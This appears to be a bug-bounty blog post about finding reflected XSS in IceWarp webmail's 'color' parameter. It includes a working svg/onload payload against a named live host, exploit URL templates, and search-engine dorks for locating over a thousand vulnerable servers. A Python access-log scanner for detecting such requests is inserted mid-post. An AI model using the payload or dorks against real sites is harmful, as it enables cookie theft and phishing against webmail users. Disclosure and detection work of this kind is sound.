How I found 1K+ XSS in just one day!

Sagar Yadav

Hi folks,

This blog is about my latest finding: how I found 1000+ XSS in just one day using Google dorks.

So let’s talk about XSS :-

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

By exploiting this vulnerability, an attacker can make a user’s browser execute the injected script and:

1. Steal the user’s cookies.
2. Launch advanced phishing attacks by rendering arbitrary HTML forms.
3. Force users to download malware/viruses.
4. Execute browser-based attacks, etc.

Now let’s come to the point: how it started.

It was the 1st week of this month, and my friend Gaurav sent his XSS finding POC on WhatsApp 😄. I checked the POC and found something familiar 🤨, so I started checking my mail and found that I had submitted 2 XSS reports to “icewarp” 3 months ago {it’s another thing that I still haven’t got any response 😑}.
I checked my POC and his: both XSS are in the same endpoint “?color=”.

http://web18.icewarp.hk/webmail/?color=“><svg/onload=alert(‘openbugbounty’)>

or

{Gaurav}

http://example.com/webmail/?color=“><svg/onload=alert(‘openbugbounty’)>

{

Exploit :-

http://example.com/webmail/?color=(XSS Payload Here)

http://example.com/webmail/old/?color=(XSS Payload Here)

}
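For operators of a webmail host, the ?color= requests described above leave a recognisable trace in access logs. The following is an added example, not part of the original post: it flags /webmail/ and /webmail/old/ requests whose decoded color value falls outside an allowlist. The log format, the allowlist pattern and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

WEBMAIL_PATH = re.compile(r"/webmail(/old)?/?", re.I)  # the two paths in the post
# Assumption: a legitimate value is a short colour name or hex code.
SAFE_COLOR = re.compile(r"#?[A-Za-z0-9_-]{1,32}")
# Request line of a Common/Combined Log Format entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; IPs are from the documentation ranges.
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2024:09:00:01 +0000] "GET /webmail/?color=blue HTTP/1.1" 200 5120',
    '198.51.100.5 - - [01/Jan/2024:09:00:02 +0000] "GET /webmail/?color=%23336699 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:09:00:03 +0000] "GET /webmail/?color=%22%3E%3Csvg/onload=alert(%27openbugbounty%27)%3E HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:09:00:04 +0000] "GET /webmail/old/?color=%2522%253E%253Csvg/onload=alert(%2527openbugbounty%2527)%253E HTTP/1.1" 200 5120',
    '198.51.100.6 - - [01/Jan/2024:09:00:05 +0000] "GET /index.html?color=%3Cb%3E HTTP/1.1" 200 300',
]

def fully_decode(value, rounds=3):
    """Undo layered percent-encoding so %253C and %3C both become '<'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_color(line):
    """Return the decoded color value if it is outside the allowlist, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not WEBMAIL_PATH.fullmatch(url.path):
        return None
    for raw in parse_qs(url.query).get("color", []):  # parse_qs decodes once
        value = fully_decode(raw)
        if not SAFE_COLOR.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_value) for each flagged line."""
    hits = ((l.split(" ", 1)[0], suspicious_color(l)) for l in lines)
    return [(ip, v) for ip, v in hits if v is not None]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} color={value!r}")
```

An allowlist on the decoded value catches the request regardless of which markup it carries, which a signature for one specific payload would not.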

Then I created a simple dork like everyone does {intext:Powered by IceWarp} and found 200-something XSS. I reported some of the XSS to Open Bug Bounty, but all went duplicate.

Then I submitted it for a CVE, but a CVE had already been assigned to someone a few weeks ago 😐

And I was like :-

I didn’t give up. I read the server documentation -> found some keywords -> made some unique dorks 🙂 BOOM, I got 1000+ vulnerable sites 🙂

Search in :- Google, Yahoo, Bing
{

intext:美拉克 伺服系統 整合通訊 / Unified Communications
intext:Basado en tecnología IceWarp Comunicaciones Unificadas
intext:Basato su IceWarp Server
intext:Tecnologia fornecida por IceWarp Server
intext:Powered by IceWarp Czech RepublicIceWarp Mail server
intext:Basato su Comunicazioni Integrate IceWarp

}

I reported 100+ sites through Open Bug Bounty, but thousands of sites are still vulnerable; you can report those sites through Open Bug Bounty.

Have a good day 🙂 Keep Hunting.